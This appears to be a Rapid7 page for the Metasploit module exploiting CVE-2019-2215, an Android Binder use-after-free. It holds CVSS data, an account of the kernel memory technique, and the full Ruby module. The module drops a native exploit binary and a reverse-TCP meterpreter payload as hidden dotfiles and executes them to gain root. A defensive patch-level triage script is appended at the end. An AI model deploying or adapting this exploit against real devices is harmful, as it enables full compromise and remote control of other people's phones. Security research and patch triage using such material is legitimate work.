Android Binder Use-After-Free Exploit

Source: metasploit (MSF:EXPLOIT-ANDROID-LOCAL-BINDER_UAF-)
Published: 2019-10-17 10:48:49
Authors: Jann Horn, Maddie Stone, grant-h, timwr
www.rapid7.com

CVSS3: 7.8 High
  Attack Vector: LOCAL
  Attack Complexity: LOW
  Privileges Required: LOW
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS2: 4.6 Medium
  Access Vector: LOCAL
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL
  Vector: AV:L/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.003 Low (Percentile 69.2%)

This module exploits CVE-2019-2215, a use-after-free in Binder in the Android kernel. The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If chained with a browser renderer exploit, this bug could fully compromise a device through a malicious website. The freed memory is replaced with an iovec structure in order to leak a pointer to the task_struct. Finally, the bug is triggered again in order to overwrite the addr_limit, making all memory (including kernel memory) accessible as part of the user-space memory range in our process and allowing arbitrary reading and writing of kernel memory.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => "Android Binder Use-After-Free Exploit",
          'Description' => %q{
            This module exploits CVE-2019-2215, which is a use-after-free in Binder in the
            Android kernel. The bug is a local privilege escalation vulnerability that
            allows for a full compromise of a vulnerable device. If chained with a browser
            renderer exploit, this bug could fully compromise a device through a malicious
            website.
            The freed memory is replaced with an iovec structure in order to leak a pointer
            to the task_struct. Finally the bug is triggered again in order to overwrite
            the addr_limit, making all memory (including kernel memory) accessible as part
            of the user-space memory range in our process and allowing arbitrary reading
            and writing of kernel memory.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'Jann Horn', # discovery and exploit
            'Maddie Stone', # discovery and exploit
            'grant-h',      # Qu1ckR00t
            'timwr',        # metasploit module
          ],
          'References' => [
            [ 'CVE', '2019-2215' ],
            [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
            [ 'URL', 'https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html' ],
            [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
            [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
          ],
          'DisclosureDate' => '2019-09-26',
          'SessionTypes' => [ 'meterpreter' ],
          'Platform' => [ "android", "linux" ],
          'Arch' => [ ARCH_AARCH64 ],
          'Targets' => [[ 'Auto', {} ]],
          'DefaultOptions' => {
            'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
            'WfsDelay' => 5,
          },
          'DefaultTarget' => 0,
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                stdapi_fs_getwd
              ]
            }
          },
        }
      )
    )
  end

  # Write data to path on the device, mark the file executable and register
  # it so the framework removes it when the session is cleaned up.
  def upload_and_chmodx(path, data)
    write_file path, data
    chmod(path)
    register_file_for_cleanup(path)
  end

  def exploit
    # Precompiled native exploit shipped in the framework's data directory.
    local_file = File.join(Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit")
    exploit_data = File.read(local_file, mode: 'rb')

    # Drop the exploit binary and the payload under random dotfile names in
    # the session's current working directory.
    workingdir = session.fs.dir.getwd
    exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
    upload_and_chmodx(exploit_file, exploit_data)
    payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
    upload_and_chmodx(payload_file, generate_payload_exe)

    # The exploit reads the command to run from stdin; feed it the payload
    # path so the payload is launched in the background and report the output.
    print_status("Executing exploit '#{exploit_file}'")
    result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")
    print_status("Exploit result:\n#{result}")
  end
end
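The module above has no check method, so there is nothing on the page that tells a defender which devices are still exposed. As an added example (not part of the Metasploit module or Rapid7's code), here is a standalone Ruby helper that classifies devices by the security patch level they report, the data a check routine or a fleet triage script would read from `getprop ro.build.version.security_patch`. The fix date in `FIX_PATCH_LEVEL`, the `SAMPLE_DEVICES` inventory and the helper names are assumptions of this example; the date is taken from the Android Security Bulletin rather than from this page and should be verified against it.

```ruby
# Added example; not part of the Metasploit module above. Classifies devices
# by reported Android security patch level relative to the fix for
# CVE-2019-2215. FIX_PATCH_LEVEL is an assumption taken from the Android
# Security Bulletin, not from this page; verify it before relying on it.
require 'date'

FIX_PATCH_LEVEL = Date.new(2019, 10, 6) # assumption, see note above

# Parse the value of `ro.build.version.security_patch` (YYYY-MM-DD).
# Returns a Date, or nil when the property is missing or malformed.
def parse_patch_level(prop)
  return nil if prop.nil?
  value = prop.strip
  return nil unless value.match?(/\A\d{4}-\d{2}-\d{2}\z/)
  Date.strptime(value, '%Y-%m-%d')
rescue ArgumentError
  # Matches the shape but is not a real date (e.g. month 13).
  nil
end

# Classify one device. Returns one of:
#   :patched    - patch level is at or after the fix
#   :vulnerable - patch level predates the fix; device likely still exposed
#   :unknown    - property missing or unparseable; needs manual review
def patch_status(prop)
  level = parse_patch_level(prop)
  return :unknown if level.nil?
  level >= FIX_PATCH_LEVEL ? :patched : :vulnerable
end

# Triage a whole inventory of id => getprop output. Returns id => status.
def triage(devices)
  devices.to_h { |id, prop| [id, patch_status(prop)] }
end

# Constructed sample inventory (not real devices), including the messy
# values a fleet export tends to contain: trailing newline, empty, missing.
SAMPLE_DEVICES = {
  'pixel-2-lab'    => "2019-09-05\n",
  'pixel-2-office' => '2019-10-06',
  'test-tablet'    => '2020-01-01',
  'emulator'       => '',
  'legacy-phone'   => nil,
}

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLE_DEVICES).each { |id, status| puts "#{id}: #{status}" }
end
```

A pre-fix patch level is a strong signal rather than proof: vendors sometimes backport kernel fixes without bumping the level, and a device can report a recent level while running an older kernel, so treat `:vulnerable` as "schedule for verification and patching" and confirm against the running kernel where it matters.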
